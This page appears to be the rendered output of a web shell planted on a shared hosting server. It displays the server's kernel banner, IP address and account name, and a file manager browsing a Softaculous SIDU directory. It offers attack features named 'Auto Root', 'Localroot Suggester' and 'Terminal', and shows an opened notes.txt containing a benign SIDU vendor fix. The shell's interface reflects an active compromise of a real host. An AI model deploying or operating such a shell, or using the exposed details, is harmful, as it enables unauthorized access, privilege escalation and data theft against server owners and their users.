Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.29
Domains :
Cant Read [ /etc/named.conf ]
User : celfico1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
sidu /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-03-14 12:18
php53
[ DIR ]
drwxr-xr-x
2026-03-14 12:18
php56
[ DIR ]
drwxr-xr-x
2026-03-14 12:18
php71
[ DIR ]
drwxr-xr-x
2026-03-14 12:18
php81
[ DIR ]
drwxr-xr-x
2026-03-14 12:18
php82
[ DIR ]
drwxr-xr-x
2026-03-14 12:18
fileindex.php
442
B
-rw-r--r--
2023-07-09 21:16
import.php
2.47
KB
-rw-r--r--
2026-03-13 01:44
info.xml
5.51
KB
-rw-r--r--
2026-03-13 00:36
install.js
921
B
-rw-r--r--
2021-12-22 22:54
install.php
3.01
KB
-rw-r--r--
2026-03-13 01:44
install.xml
199
B
-rw-r--r--
2021-12-22 22:54
md5
7.56
KB
-rw-r--r--
2026-03-13 01:44
notes.txt
927
B
-rw-r--r--
2021-12-22 22:54
upgrade.php
2.4
KB
-rw-r--r--
2026-03-13 01:44
upgrade.xml
231
B
-rw-r--r--
2021-12-22 22:54
Save
Rename
The following problem has been resolved in SIDU 3.7----------------------------------- If you get errors when you click on 'User' tab in menu then Solutions (Recommended by Script Vendor): 1 - open file: user.php ======================== <?php //0id 1tab 2user@host 3db 4table include 'inc.page.php'; $SIDU['page']['nav']='defa'; uppe(); echo "<div class='web'>"; main($SIDU,$user,$acs,$acs2,$grant,$cmd); echo '</div>'; down(); ... ========================= Above is the top part of user.php. simply add "@" before uppe() and main(...) and down() so it will look like the following: ======================== <?php //0id 1tab 2user@host 3db 4table include 'inc.page.php'; $SIDU['page']['nav']='defa'; @uppe(); echo "<div class='web'>"; @main($SIDU,$user,$acs,$acs2,$grant,$cmd); echo '</div>'; @down(); ... ========================= 2)We have changed the php requirement to 5.4 due to syntax error in version 6.0.